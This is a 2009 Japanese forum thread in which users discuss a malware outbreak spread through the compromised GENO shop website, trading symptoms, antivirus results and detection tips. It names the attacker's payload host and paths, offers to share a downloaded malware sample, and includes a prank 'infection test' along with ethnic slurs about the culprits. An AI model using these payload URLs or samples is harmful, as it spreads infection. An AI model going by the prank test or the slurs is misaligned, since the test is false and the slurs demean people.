ゲンカイツツジ(関東地方) :2009/04/07(火) 00:38:14.71 ID:dei4a9zR
まさにGENO
俺は怪しいjpgを専ブラで開くといつも 読み込むんだけど最後にデコードエラーと出て真っ赤になるぜ これは大丈夫だろう
GENOの由来はジェノサイド まちめきしな
>>213 マウスオーバーで画像を開く にチェックいれて画像すれみてたら
以前カスぺが反応したことあるよ
だから今回は知らないが安全とはいえないのでは
236 :
ラフレシア(東京都) :2009/04/07(火) 00:39:34.76 ID:Yn6ot/oR
同業者をジェノサイドするつもりがお客をジェノサイドw
デコードエラー+画像キャッシュにトロイが見つかる
マウスオーバーで開く設定にしてるからだろ
avast入れてる人、他のソフト入れてないの? ファイアウォール対策ソフトとか
かかったやつどれくらいいいんの
241 :
モリシマアカシア(東京都) :2009/04/07(火) 00:40:38.66 ID:fhtlRrYZ
周りが騒いでるからとりあえずTOPを閉鎖しておいて、 ほーむぺーじ作ってもらった会社に直してもらうまで放置なんじゃないかね
242 :
アルストロメリア(愛知県) :2009/04/07(火) 00:40:59.06 ID:PpAfGl6U
GENO側ではまだ原因も分からなければ対策も何もしてないっぽいから、 不安ならアクセスしないほうがいい。
不具合ありました すまねで許されるの? 他の国だったら禁固5年か10万ドル以上の罰金確定なんだけど
245 :
フジスミレ(アラバマ州) :2009/04/07(火) 00:41:31.06 ID:6pPwwKqG
firefoxでよかった
ノートンは無力だよなあ。 まったく役になっていないわあ。(´・ω・`)ショボーン あと2週間で切れるから他社製品に切り替えるわ。
247 :
サトザクラ(dion軍) :2009/04/07(火) 00:42:23.66 ID:uS2Hnc6/
火狐なら平気なのか?
そっか…
画像プレビューポップアップを無効にしておこう
>>227 普通に写真画像とかが出ても偽装で実は混入してるとかあるのかな
249 :
ヤエヤマブキ(京都府) :2009/04/07(火) 00:42:53.63 ID:a3TeJlzo
Javaきってないと火狐でもアウト
カスペとAvast以外は全て無力だったぞ。どこに乗り換えるんだよ。
251 :
ニリンソウ(福岡県) :2009/04/07(火) 00:44:06.63 ID:RbWqx5rG
仕事用のPC感染した\(^o^)/マジデ人生オワタ
252 :
ヒヤシンス(福岡県) :2009/04/07(火) 00:44:08.30 ID:pnDf58uK
線ブラでjpgのサムネがでる設定でもアウトなのか?
253 :
センダイハギ(千葉県) :2009/04/07(火) 00:44:16.84 ID:wchpM5xR
寝る前に仮想PCで丸裸の状態で踏んでみるか
254 :
アルストロメリア(愛知県) :2009/04/07(火) 00:44:34.74 ID:PpAfGl6U
PDFとフラッシュの奴を最新のにするとするか・・・
IEコンポの専ブラはIEの設定によってはアウト
256 :
ストック(愛知県) :2009/04/07(火) 00:46:34.27 ID:vwosJmBt
以前にも開いた瞬間にjaneが落ちて起動できなくなるjpgとかあった気がする まぁこれからは何踏むとしてもそいつのIDやらそいつへのレスをよく見るんだな
257 :
ヤエヤマブキ(福岡県) :2009/04/07(火) 00:46:57.69 ID:pgsxCmAv BE:438557748-2BP(8000)
>>239 avastと相性いいのがどうも見つからないんでMS任せ
258 :
キバナノアマナ(東京都) :2009/04/07(火) 00:47:47.32 ID:0vDWarrT
お前ら未だやって田野かよ
261 :
アヤメ(アラバマ州) :2009/04/07(火) 00:48:04.12 ID:bkbnravR
263 :
ラフレシア(東京都) :2009/04/07(火) 00:48:16.78 ID:Yn6ot/oR
genoをばんばんヤバリストに登録するだけw
264 :
マンサク(長野県) :2009/04/07(火) 00:48:39.32 ID:Dql0WP7n
今このスレみつけた 数時間前にしっかり踏んでた オワタ
265 :
アルメリア(長屋) :2009/04/07(火) 00:49:22.50 ID:P/l2+MNt
266 :
ヤエヤマブキ(福岡県) :2009/04/07(火) 00:49:28.18 ID:pgsxCmAv BE:657835586-2BP(8000)
>>708 IE→インターネットプロパティ→設定→ファイル表示でフォルダ開いて
94.247.2.195/jquery.jsがいるかどうかじゃないかなあ。
これって削除してもいいんですかね。
で、かかったとして 何がどうなるの?
ちょっとavastについて教えてほしいんだが ログのれベルってあるけどウイルス検査とかでウイルス見つかったらログとるようにするにはどれに設定すればいいの? それとjaneみたいな2chブラウザで開いてる画像とかもウイルスやスパイウェア検出してくれる? してくれてない感じなんだけど
270 :
アルストロメリア(愛知県) :2009/04/07(火) 00:51:21.95 ID:PpAfGl6U
271 :
ニリンソウ(福岡県) :2009/04/07(火) 00:51:37.53 ID:RbWqx5rG
楽天も感染してたんだろ・・・・ いつも楽天見てるオバチャンのせいに・・・・なんかしないぜ・・・・・^^ あああああああああああああああああああああ寝たくねぇえええええええええええええええええ 会社行きたくねえええええええええええええええええええええええええ
272 :
ヘビイチゴ(静岡県) :2009/04/07(火) 00:51:37.76 ID:Fe1RTXma BE:876765964-PLT(16543)
>>268 ・PDFファイルとかシステムファイルがなぜか増殖する
・メモリを馬鹿食いする
・再起動時にブルースクリーン
274 :
アルストロメリア(愛知県) :2009/04/07(火) 00:52:36.03 ID:PpAfGl6U
>>271 楽天もだめなの? 楽天で中古パソコンあさってた俺どうなるの? 今の所感染してないが
275 :
斑入りカキドオシ(神奈川県) :2009/04/07(火) 00:52:36.22 ID:+su157I6
とりあえずNoScript導入した。 これいいわ
コレ結局GENOは不具合がありましたで済ませるつもりか?w
>>272 その三つの症状はないがオンラインスキャンをブロックされているような動作が感じられるのはなぜだろう。。。
278 :
カラスビシャク(東京都) :2009/04/07(火) 00:53:43.58 ID:FHQHfmz1
この隙に、掘り出し物をと思ってアクセスしたのに 相変わらずのゴミだらけでワロタ
279 :
アルストロメリア(愛知県) :2009/04/07(火) 00:54:29.47 ID:PpAfGl6U
マカフィーウイルスすきゃん 2件検出 2件隔離 これは大丈夫なのか・・?
280 :
ニリンソウ(福岡県) :2009/04/07(火) 00:54:36.75 ID:RbWqx5rG
>>274 楽天の一部らしい
どこかは知らん
大丈夫お前は踏んでねーよ
俺も踏んだけど結局何もなかった 重くなったからすぐブラウザ閉じたけど
282 :
オニノゲシ(大阪府) :2009/04/07(火) 00:55:10.57 ID:IV9ngAhn
283 :
アルストロメリア(愛知県) :2009/04/07(火) 00:55:18.24 ID:PpAfGl6U
>>280 一瞬顔面クレイジーになったけど安心した
これブラウザの脆弱性とは関係ないんだろ、だからどのブラウザ使っているかどうかは問題じゃない。 結局、使っているソフトはセキュリティパッチが出たらすぐアップデートできるよう注意し続けるしかないよ。 パッチ未適用でもアンチウイルスがカバーしてくれるかどうかに賭けてもしょうがないし。
GENOはどれだけ殉職者を増やすつもりだ 絶対に許さない(`;ω;´)
>>270 >>272 ありがとありがと
じゃあボクのPCが今かかってるのとは違うや
spybot走らせると途中でワトソン博士がうんたらかんたら言って
処理が止まっちゃうやつだから
ホワイトリスト方式でcookie受けるアドオンない?
288 :
キクザキイチゲ(静岡県) :2009/04/07(火) 00:56:37.83 ID:udlrcte1
感染確認するにはどうすりゃいい?
289 :
ヤエヤマブキ(京都府) :2009/04/07(火) 00:57:04.76 ID:a3TeJlzo
再起動
290 :
サトザクラ(dion軍) :2009/04/07(火) 00:57:11.60 ID:uS2Hnc6/
再起動しておかしなことにならなかったら平気なんだね 安心したからシコって寝よ
291 :
ハナビシソウ(関西地方) :2009/04/07(火) 00:57:27.18 ID:HRQhxBob
情弱共哀れwwwwwwww とか言ってる俺も 間違ってzip偽装踏んじまったんだけどな まあ、フラッシュはたまたま最新版だったし、何よりOperaでフラッシュはその時切ってたからマジ無問題 やっぱ情弱哀れwwwwwwwwwwww
netstat /a とかで感染わかるの?
293 :
ヤエヤマブキ(福岡県) :2009/04/07(火) 00:57:42.01 ID:pgsxCmAv BE:863409479-2BP(8000)
でもそうすると 犯人は朝鮮人? このタイミングだし
295 :
ヤエヤマブキ(京都府) :2009/04/07(火) 00:58:14.05 ID:a3TeJlzo
被害はどれくらいなのかねえ
296 :
ボロニア・ピンナタ(長屋) :2009/04/07(火) 00:58:49.08 ID:9H6YK50+
感染したらどうなるのか?については報告者によってまちまちなんだよね
とりあえずラトビアと通信してpdfやらswfを落として何か悪さをするらしい
http://tsushima.2ch.net/test/read.cgi/news/1238897231/572- 572 名前: 姫カンムリシャジン(北海道)[] 投稿日:2009/04/05(日) 17:30:38.90 ID:SJFT5u/E
genoのサイトを開くと以下のURLが呼ばれるんだが
94.247.2.195/news/?id=100 (IEの場合こっちが呼ばれる)
94.247.2.195/news/?id=101 (それ以外の場合こっちが呼ばれる)
うちの環境ではどちらを開いても以下のコードしか出てこない。
// No news...<script>
var t=new Date(1148027392000);document.cookie="miek=1; expires="+t.toGMTString()+"; path=/";
//</script>
ただcookieを書き込んでるだけ。よって何も起こらない。
しかしどうも前スレの報告によると、このURLにPDFやswfをダウンロードさせるコードが含まれてる場合もあるみたいなんだよな。
とりあえずうちでは攻撃が確認できないので、これ以上の解析は無理だ
297 :
ヘビイチゴ(静岡県) :2009/04/07(火) 00:58:58.91 ID:Fe1RTXma BE:730638645-PLT(16543)
>>291 踏んだ時点で不安は払拭されなくなるんだよなwwwwwww
avastがマルウェア拒否したけど
やっぱ不安wwwwwwwwwwwww
>>288 maro zip zip oppai
をメモ帳に打ち込んで保存。コピペ可。
一度閉じて開いた時文字化けしてればキンタマ感染中
301 :
ヤエヤマブキ(福岡県) :2009/04/07(火) 01:00:39.33 ID:pgsxCmAv BE:740065469-2BP(8000)
カスペのオンラインスキャン
>>297 タスクマネージャ見たけど何があればアウトなの
304 :
オオバコ(長屋) :2009/04/07(火) 01:02:19.06 ID:jJNoS11x
NoScriptの許可リストに入れてるようなサイトが狙われるともう大変なことになるな
ESET(NOD32)はまだ対応してないくさいな。 PDF落としてきてスキャンしたんだがスルーだ。
306 :
キクザキイチゲ(静岡県) :2009/04/07(火) 01:03:12.64 ID:udlrcte1
メモリ一番食ってるのはashWevSvだけだった ありがとう寝る
307 :
サトザクラ(東京都) :2009/04/07(火) 01:04:18.25 ID:YcIo+r6z
>>292 netstat -nb
cmd.exeが接続先「94.247.2.195」とかならアウト
308 :
ムラサキサギゴケ(大分県) :2009/04/07(火) 01:04:27.63 ID:tk8lvfBv BE:82197825-2BP(7222)
* 8世紀 - ヴァイキングが進出。居留地のみ。
* 13世紀初めごろに、リヴォニア帯剣騎士団が領有を始める。
* 1629年 - リヴラント(スウェーデン)とクールラント(ポーランド)に分裂。
* 1730年 - リヴラントもクールラントも事実上ロシア帝国の支配下に。
* 1920年1月13日 - ロシア帝国から独立。
* 1940年8月5日 - ソ連に併合される。
* 1991年8月21日 - ソ連から独立を回復。
* 2004年5月1日 - 欧州連合 (EU) に加盟
今回の騒ぎで短縮URLがやばいってのがよーくわかった いろんな人騙しやがってちくしょうめ
310 :
アルストロメリア(愛知県) :2009/04/07(火) 01:04:38.00 ID:PpAfGl6U
メモリとCPU一番食ってるのマカフィーだった
311 :
モモイロヒルザツキミソウ(東京都) :2009/04/07(火) 01:05:01.58 ID:bOygpSnt
>>269 このスレ開いただけで検知した(ImageViewURLReplace.dat使用)
ESETの3990来たな UpdateInfoは未公開っぽいが
「GENO担当者の脳に一部不具合がございました。」
/) ///) /,.=゙''"/ 人人人人人人人人人人人人 i f ,.r='"-‐'つ____ < > / _,.-‐'~/__, , ‐-\ < こまけぇことは・・・ん? > ,i ,二ニ (●). (●) \ < > ノ il゙フ (__人__) \ YYYYYYYYYYYYYYYYYYYYYYY ,イ「ト、 ,!,!|  ̄` | / iトヾヽ_/ィ"\ / ========================== l ヽ. | | | | . | __| | __ | |^)_ | ,-、 _ | | | | .|ノ |. i ヽ i'i. ヽ. -‐、 ! !-! ‐- ヽ. 〉、 l / _ ノ.ヽ. `' (ノo(ヽ/ ヽノ (ノ | ヽ. ,`ヽ,ソ )ノ ノ/o | \ ' / / l ()ヽ l ヽ. ' | (⌒ヽ | ヽ. | しノ / ==========================
バスターの自動アップデート来たから期待してたのにクッキーしか検出しないw
>>313 94.247.2.195/news/?id=3
のPDFはスルーのようだ。
まぁこれが本体とは限らないけど。
94.247.2.195から落としたLa.exe誰か要るか?
再起動してブルースクリーンにならないでタスクマネージャ起動してcmd.exeが無ければ大丈夫なのか?
>>318 取りあえず振り分け無しのフォルダに保存しようかと思ったが
なんか顔がムカつくのでやめた
323 :
コバノランタナ(千葉県) :2009/04/07(火) 01:10:55.87 ID:hD4R3NI8
>>301 うちも実際に発症していないんで、
>>296 さんの説と亜種がわんさかって事以外に関してあくまで仮説だけど、
id=ほにゃらら の処理が行われるとCPU負荷率が余りに高くなりすぎて
ウィルスのスクリプトが完走しないって事なんかも考えられるかも。
325 :
ヒマラヤユキノシタ(福岡県) :2009/04/07(火) 01:11:20.33 ID:vdumWT6M BE:361131146-PLT(12190)
これを期にAVGからavast!に乗り換えたわ
つかまだこのウイルスの全容が見えないとは
>>322 おれもだ、保存するまではないけどjaneのキャッシュに残しとこうと思って貼った
もう丸見えだろ
328 :
ヤエヤマブキ(福岡県) :2009/04/07(火) 01:14:26.99 ID:pgsxCmAv BE:287803837-2BP(8000)
330 :
メギ(東京都) :2009/04/07(火) 01:15:27.12 ID:SNZhFgrd
>>323 今ウチにいるのは
?id=100 html
?id=2 PDF
?id=3 SWF
なんですけれどもどうしたらいいんですか><
332 :
マムシグサ(dion軍) :2009/04/07(火) 01:17:28.33 ID:Pgq7lh9W
333 :
ハナビシソウ(関西地方) :2009/04/07(火) 01:17:36.96 ID:HRQhxBob
よく考えてみたら俺が普段しないフラッシュアップデートをしたのはたまたまじゃなくて重大な脆弱性ニュース見たからだわ お前らも自宅警備を怠らずニュースぐらいはチェックしとけよ あと、このノリでavastに乗り換えようとしてるそこのアホ、avastマンセーってなってる馬鹿にはAvira Antivirをお勧めしておく
>>173 ※このアドレスは危険URLのひとつです。
危険!mailtoストームを発見! (1115)
335 :
コバノランタナ(千葉県) :2009/04/07(火) 01:17:59.42 ID:hD4R3NI8
>>331 リカバリするか、とっととクリーンインストールしたほうがよいよ。
>>329 使い方も書いてないし怪しくて手だせなくね・・・
337 :
メギ(東京都) :2009/04/07(火) 01:19:55.28 ID:SNZhFgrd
338 :
オキナワチドリ(岩手県) :2009/04/07(火) 01:20:12.83 ID:yOFciNDi
340 :
ガーベラ(鹿児島県) :2009/04/07(火) 01:21:45.64 ID:n6STd+4C
再起動ウィルス以来の恐ろしいのが来たなwwwwwwwwwwwwwwwwwwww
今日、HDD買ってきてファイル保存退避させてからクリンインスコするしかないのかねえ。
>>338 セキュ板だったら黙ってNOD32じゃね。
?id=100にVistaでアクセスした人は2回目以降XPでアクセスしてもクッキー書き込みのスクリプトしか返さないらしいよ。 IPアドレスとユーザエージェントをサーバ側で管理してるらしい。 逆に、初回にXPでアクセスした人は、次にVistaでアクセスしても?id=2と?id=3への誘導コード入り。 つまりVistaでも感染の可能性あり。
リンク取得した時点で駄目なのか さすがavast
345 :
ストック(愛知県) :2009/04/07(火) 01:23:22.52 ID:vwosJmBt
全然関係ないけど昔ブラスターワームってのがあったよな ただ再起動するだけだったけど当時はびびったもんだ
346 :
ベゴニア・センパフローレンス(愛知県) :2009/04/07(火) 01:23:39.84 ID:ed3Zrgfv
Avira Antivirマダ対応してないんだろ いくらなんでもうんこすぎんだろ
バルト三国め
適当に改行 using System; using System.Collections.Generic; using System.Text; using Microsoft.Win32; namespace geno{ class Program{ static void Main(string[] args){ Console.WriteLine("GENOウイルス検査ツール\n"); RegistryKey regkey = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32"); if (regkey != null){ string tes = (string)regkey.GetValue("aux"); if (tes == @"%System%\..\bpagokx.nmy"){ Console.WriteLine("感染の可能性があります"); } else{ Console.WriteLine("感染の形跡はありません"); } } else { Console.WriteLine("regkey not found"); } Console.ReadLine(); }}}
350 :
ヒマラヤユキノシタ(福岡県) :2009/04/07(火) 01:24:59.28 ID:vdumWT6M BE:150471825-PLT(12190)
>>333 布教したいならどこがどう良いのか解説しろよ
351 :
ニリンソウ(福岡県) :2009/04/07(火) 01:25:16.51 ID:RbWqx5rG
エクセルデータとかは無事なのかね?
あれwAvastでLa.exe検出されなくね?
353 :
コバノランタナ(千葉県) :2009/04/07(火) 01:25:36.42 ID:hD4R3NI8
>>339 中のEXEはノートン先生反応しないね。
取り扱い要注意。
でUPX圧縮されててアンパッカーインスコしてないからこれ以上追えないわ。
おいらは終了。
何だかわからんが、伝家の宝刀ウイルスセキュリティ ゼロを入れてる俺には無縁な話か
何したら良いのか分からん
357 :
ハナビシソウ(関西地方) :2009/04/07(火) 01:27:29.64 ID:HRQhxBob
春厨かよ
落としたみたがバカフィーまったく反応しねえ
360 :
プリムラ・ヒルスタ(富山県) :2009/04/07(火) 01:28:32.03 ID:3AlrDAYx
同じくAVG反応せず
361 :
アルストロメリア(愛知県) :2009/04/07(火) 01:28:35.78 ID:PpAfGl6U
>>358 バカフィーとかいうな バカフィー様といえ
363 :
ハナビシソウ(関西地方) :2009/04/07(火) 01:28:51.59 ID:HRQhxBob
ちなみにAvira無反応
364 :
コバノランタナ(千葉県) :2009/04/07(火) 01:29:05.16 ID:hD4R3NI8
あ、バイナリエディタでUPX圧縮済みのを見ても スレの最初のほうで報告があったu.batの文字列が書かれてる。
デフラグ何度してもCドライブ全部真っ赤なままなんでさっきリカバリした。 GENOが原因かは不明だが踏む前はなんともなかった。
366 :
ヘビイチゴ(静岡県) :2009/04/07(火) 01:29:58.68 ID:Fe1RTXma BE:1169020984-PLT(16543)
>>303 577 名前: キバナスミレ(関東・甲信越)[] 投稿日:2009/04/05(日) 17:42:12.62 ID:vha5s7Cg
>>570 アクセスしたらマウスの動きが重くなったんで、おかしいなと
そんでnetstatコマンド打ったら94.247.2.195と通信してた
そしたらコマンドプロンプトが突然落ちた
その後タスクマネージャ見たらconime.exeが動いてた
良いバックアップツール探してる 入れ忘れたソフトが多くて思い出せないわ
368 :
ヒメスミレ(dion軍) :2009/04/07(火) 01:30:53.64 ID:tEaYs6hO
>>339 ぱす何教えろ?
369 :
ノゲシ(滋賀県) :2009/04/07(火) 01:30:57.41 ID:LDsW9EA+
そんでnetstatコマンド打ったら94.247.2.195と通信してた そしたらコマンドプロンプトが突然落ちた その後タスクマネージャ見たらconime.exeが動いてた ネタだろ
370 :
アルストロメリア(愛知県) :2009/04/07(火) 01:31:07.40 ID:PpAfGl6U
>>366 conime.exeなんて毎日動いてるだろ
371 :
オキナワチドリ(岩手県) :2009/04/07(火) 01:31:11.54 ID:yOFciNDi
372 :
アヤメ(アラバマ州) :2009/04/07(火) 01:31:28.91 ID:bkbnravR
>>339 Antivir 7.01.03.20
AVAST! 090406-01
スキャンしても無反応です なんで?
>>367 232 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/04/07(火) 01:23:57
リカバリして帰還したが入れてないソフト重いだせん・・・
ああ思い打線のだよ。
ということは、La.exeは反応しないからあぶないなあ。どういう動きするファイルかは知らないけど。
vipからのお客様が混ざってるみたいですね。巣に持ち帰って ばら撒く気か?
379 :
ベゴニア・センパフローレンス(愛知県) :2009/04/07(火) 01:32:49.23 ID:ed3Zrgfv
もう消しとけばいいんじゃないかな
380 :
オオバクロモジ(catv?) :2009/04/07(火) 01:33:27.87 ID:5Nd8UKQv
キーワードが正しくありません
381 :
ヤエヤマブキ(福岡県) :2009/04/07(火) 01:33:30.66 ID:pgsxCmAv BE:1110097499-2BP(8000)
382 :
コバノランタナ(千葉県) :2009/04/07(火) 01:33:38.59 ID:hD4R3NI8
>>368 ν速のお約束パス。
昔のここの鯖名をテキトーに入れてみそ。
ここまで反応ありのソフト無しかよ。つーか有名どころ全滅?
>>345 PC壊れたから新しいの買ったんだけど
ネットに繋いだ途端に入ってきて困ったよw
PCの新品激安 スレでGENO見てみろって書かれて知らずに踏んだ。 激安PCあるのかと
389 :
アヤメ(アラバマ州) :2009/04/07(火) 01:35:02.34 ID:bkbnravR
でもメモリは確実に食ってWindowsはモッサリする これって全然解決してないんじゃないか?w
390 :
アルストロメリア(愛知県) :2009/04/07(火) 01:35:09.83 ID:PpAfGl6U
おまえらクリーンインスコ位いつでも出来る環境にしとけよ 何騒いでるんだ
たった今2回目のクリーンインスコ\(^o^)/オワタ もう踏まないw
395 :
サトザクラ(dion軍) :2009/04/07(火) 01:35:37.44 ID:ly823CjS
396 :
コバノランタナ(千葉県) :2009/04/07(火) 01:35:57.83 ID:hD4R3NI8
>>391 いままで馬鹿にしてたけど、ちょっと見直したわw
397 :
ベゴニア・センパフローレンス(愛知県) :2009/04/07(火) 01:35:59.25 ID:ed3Zrgfv
5つしか対応してないとか流石におわてる
398 :
アルストロメリア(愛知県) :2009/04/07(火) 01:36:00.56 ID:PpAfGl6U
>>390 DOSに、
GENOウイルス検査ツール
感染の形跡はありません。
って表示されてる画像
401 :
アルストロメリア(愛知県) :2009/04/07(火) 01:36:43.71 ID:PpAfGl6U
あ、削除パス忘れたw
404 :
マムシグサ(dion軍) :2009/04/07(火) 01:37:26.38 ID:Pgq7lh9W
>>339 ありがとう
?id=10で何度か落としてみたけどLa.exe以外にも
Gml.exeとか6x.exeとかで落ちてきたから
名前はランダムで決まるっぽいな
VirusTotalで.exeを検知できるのは以下の6つだけ
eSafe 7.0.17.0 2009.04.06 Suspicious File
McAfee 5576 2009.04.06 Generic Dropper.ef
McAfee+Artemis 5576 2009.04.06 Generic Dropper.ef
Prevx1 V2 2009.04.06 High Risk Cloaked Malware
Symantec 1.4.4.12 2009.04.06 Trojan.Dropper
TrendMicro 8.700.0.1004 2009.04.06 PAK_Generic.001
ノートンで検知しない人はデイリーdat入れてみたら?
94.247.2.195/news/?id=10 ここから拾ったexeも反応なしだ > ESET 2回目以降exeが落ちてこなくなった(ノ∀`)
407 :
ヤエヤマブキ(福岡県) :2009/04/07(火) 01:38:28.36 ID:pgsxCmAv BE:383737474-2BP(8000)
>>339 ファイル保存しなくて良かった・・・・・
英語出来るならESETに検体送ってやれ
>>75 どうやら感染していなかった
これ感染してた場合なんて出るん?
411 :
コバノランタナ(千葉県) :2009/04/07(火) 01:42:23.74 ID:hD4R3NI8
>>408 ?id=10のexeと?id=2のPDFは送っておいた
413 :
エビネ(北海道) :2009/04/07(火) 01:43:45.79 ID:kxKVEndS
怖くて全部踏めないわ
414 :
アルストロメリア(愛知県) :2009/04/07(火) 01:43:47.07 ID:PpAfGl6U
マカフィー入れててよかっただなんて初めて思った
avira7.1.3.21更新きた 前スレか前々スレあたりの人の話が本当ならこれで対応された?
416 :
コバノランタナ(千葉県) :2009/04/07(火) 01:44:09.15 ID:hD4R3NI8
あ、IF EXISTだからu.batの存在の有無をチェックしているのかも知れないわ。 これ以上はおいらわかんない。
418 :
カンパニュラ・サキシフラガ(大阪府) :2009/04/07(火) 01:44:50.47 ID:xLJJRuyw
なんかお前らかっこいいぞ。閉鎖騒動の時のUNIXを思い出す
なになにavast!は検知できないの?
また閉鎖騒動起きないかな。
>>418 自動取得設定してるならアウト
触れてもアウト
こりゃぁえらい被害だなwwwww
マイクロトレンド(ウイルスバスター2009)で、 2009/04/06の更新したけれど。 prnファイルのプリントソフトを誤検出してないか? 処理されちまったファイル、どうやって戻すんだよ。
425 :
トウゴクシソバタツナミ(catv?) :2009/04/07(火) 01:49:06.24 ID:dyBCfAKh
>>422 触れてもアウトってニトログリセリンみたいなウイルスだな
426 :
キンケイギク(茨城県) :2009/04/07(火) 01:49:14.63 ID:qBKuVinG
なんで閉鎖しないの? 狂ってるの?
427 :
マムシグサ(dion軍) :2009/04/07(火) 01:49:20.34 ID:Pgq7lh9W
>>415 .jsと.pdfには対応してるが、
.exeと.swfには未対応
自分はPersonalなのでProfessionalで対応してるかとは分からん
最新avira
>>339 反応しないや とおもったけど他のも反応しないのか
jsファイルに反応するってことか
429 :
コバノランタナ(千葉県) :2009/04/07(火) 01:50:07.94 ID:hD4R3NI8
>>420 恐らく、あくまで仮説だけど、
現状の各セキュリティソフトメーカーは
みんな書き換えられたjQuery.js内のid=ほにゃららの文字列だけをチェックしてウィルス判定しているだけで、
単にこのexeファイルに関しては全然チェックしていないってだけだと思うよ。
恐らく検体提出されて数日以内に即効で検出される様に対処されると思うけど。
430 :
クロッカス(東日本) :2009/04/07(火) 01:50:21.83 ID:v2pFr5JY
>>339 avira,avg,avast送付済み
バイオハザードみたいだ
なんでGENOは何も対応しないんだよ マジで教えてくれよ
434 :
コバノランタナ(千葉県) :2009/04/07(火) 01:51:26.27 ID:hD4R3NI8
これどこの会社なの? 社長シナか韓国人なの?
436 :
モリシマアカシア(東京都) :2009/04/07(火) 01:52:04.44 ID:fhtlRrYZ
外部に作ってもらって対策できるスキルがないんでしょ と、言う事だったらwebページ作った会社と鯖缶してる方の責任になるのかね
437 :
オオバクロモジ(catv?) :2009/04/07(火) 01:52:49.70 ID:5Nd8UKQv
438 :
アルストロメリア(愛知県) :2009/04/07(火) 01:52:51.64 ID:PpAfGl6U
村岡SEXYウイルスの被害はひどいな なによりもGENOの対応が酷い
まだ直ってないのかよw もう火曜日だぞ
440 :
サトザクラ(関西地方) :2009/04/07(火) 01:53:47.14 ID:gVHhPofa
とりあえずpeerguardianにIP登録しといた ログ眺めてもアクセスしてる形跡はない antivir,comodo使用、WinXPで最新にしてる ゲノはNECノート祭り以降は踏んでないと思うけど不安 いつから問題発生したんだ? アンチウイルスでどのディレクトリをスキャンしたらいいかも教えて
441 :
ストック(愛知県) :2009/04/07(火) 01:53:55.06 ID:vwosJmBt
つーかこれGENOの担当のPCも死んでて鯖だけが動いてるってことはないよな
携帯でもアウトなん? ごろごろしながらしてて洒落にならんとかいやぜら
443 :
アルストロメリア(愛知県) :2009/04/07(火) 01:54:15.41 ID:PpAfGl6U
>>440 4月4日とかなんとか
まだ内容詳細わかってないらしい
なんでログ読まねえんだよ。どっから来てるか知らないがいちいち 毎回最初から説明しないといけないのか?
446 :
アルストロメリア(愛知県) :2009/04/07(火) 01:55:19.95 ID:PpAfGl6U
マカフィーのフルスキャンが96%から進まん
447 :
ヤエヤマブキ(福岡県) :2009/04/07(火) 01:56:19.31 ID:pgsxCmAv BE:863409479-2BP(8000)
>>442 携帯に被害及ばすウイルスって今から多くなるかもな
448 :
トキワヒメハギミツバアケビ(愛知県) :2009/04/07(火) 01:56:24.02 ID:QpUgyCdr
u.batが無いけど、cmdが立ち上がらん アプリが全部落ちる なぜだ?
449 :
ヤブヘビイチゴ(栃木県) :2009/04/07(火) 01:56:24.53 ID:4Ho9PgV+
のちのスカイネットである
セキュ板など色々な場所にこのスレ貼られてるからな
452 :
マムシグサ(dion軍) :2009/04/07(火) 01:56:52.38 ID:Pgq7lh9W
>>427 自己レス
?id=3で得られる.swfは関係ないかも
virustotalでもonline malware scanでも検知されない
再生してみたけど真っ黒で何も映らない
5時間ぶりにきたが動きあった?
マカフィー様々のフルスキャンですら検知しないから安心していいよな そもそもふんでないけど
456 :
クロッカス(東日本) :2009/04/07(火) 01:57:54.81 ID:v2pFr5JY
Avast!入れておけばURLに接続できないからやってみ。
457 :
コバノランタナ(千葉県) :2009/04/07(火) 01:58:14.03 ID:hD4R3NI8
>>453 ただ今スレ内の有志でウィルス解析中。。。
>>436 398 名前: コハコベ(千葉県)[] 投稿日:2009/04/06(月) 02:24:55.81 ID:RAsn9HbR
>>370 基本的に警察に書類送検されたりするのはあくまでサイト運営管理者側のゲノかと。
ただ、ここは実際にどういう契約になっているか知らないけど、
まともな企業が外注に仕事を投げる時はSLA(Service Level Agreement)と言って、
品質保証にまつわる契約を予め取り交わすんだよ。ま、その分契約金が高くなるけどな。
で、万一事前に取り交わした契約に盛り込まれた要求仕様にそぐわない物を納入したりすると
金銭的に外注企業から賠償を取れる契約を一緒に取り交わすんだよ。
だからそーいうまともな企業間契約を行っていると結局どっちにもツケがまわる。
ただ、恐らくここは保守更新契約まで含めて安くいー加減な契約をしてたと思うんで、
一方的にゲノが責任を負うケースになると思うよ。
今avastでやってみたけど、検出しなかった。 結局どうなんだ?
460 :
アルストロメリア(愛知県) :2009/04/07(火) 01:59:08.69 ID:PpAfGl6U
>>454 検出した項目 2 オワタ きっと別のスパイウェアとかウイルスとかだとおもうが
今終わった 対応する必要はないとでた
ESET送っておいた
463 :
アルストロメリア(愛知県) :2009/04/07(火) 02:00:00.42 ID:PpAfGl6U
検出したのは二件ともマカフィーお得意のトロイの木馬だった
もういい。一週間はPC起動しないわ
>>460 もしかしてGENO踏んだのにそうでたのか?
466 :
ジギタリス(東京都) :2009/04/07(火) 02:02:11.10 ID:74MmVZko
467 :
ミヤマアズマギク(関西地方) :2009/04/07(火) 02:02:35.00 ID:E1uIbHZz
情強気取りがあたふたしてるのは笑えるな
468 :
アルストロメリア(愛知県) :2009/04/07(火) 02:03:22.18 ID:PpAfGl6U
>>465 いや、俺の過去のレスを読んでくれるとわかるけど、俺に感染時の具体的症状はでてないんだ
469 :
ゲンカイツツジ(長屋) :2009/04/07(火) 02:03:29.52 ID:iaH3XBff
ゲノの謝罪なしですか?
470 :
エビネ(北海道) :2009/04/07(火) 02:03:38.64 ID:kxKVEndS
再起動余裕でした
最近fc2のブログでもウイルスが流行っているな
>>33 見てavast入れてフルスキャンして
何も検出されてなければ
とりあえず無事でFAって事でいいの????
このスレでは何も踏んでないし・・・・・・・・・
それと
これから踏みに言って「踏むなボケ!?」って言われるかどうかは「運」ってことなの?
474 :
カラスビシャク(catv?) :2009/04/07(火) 02:05:01.83 ID:zEoZBwqn
>300 愉快犯w
475 :
ハルジオン(コネチカット州) :2009/04/07(火) 02:05:11.34 ID:MsYkq/Tq
ニュー速とGENOスレ以外どこも取り上げないな、ネットニュース何やってんだ IT系巣窟のはてなですら見かけないし
476 :
アルストロメリア(愛知県) :2009/04/07(火) 02:05:38.60 ID:PpAfGl6U
俺の5歳になる老人PCだと強いウイルスに感染したら きっと爆発すること必定なり
ざわ・・・ざわ・・・
478 :
コバノランタナ(千葉県) :2009/04/07(火) 02:06:23.04 ID:hD4R3NI8
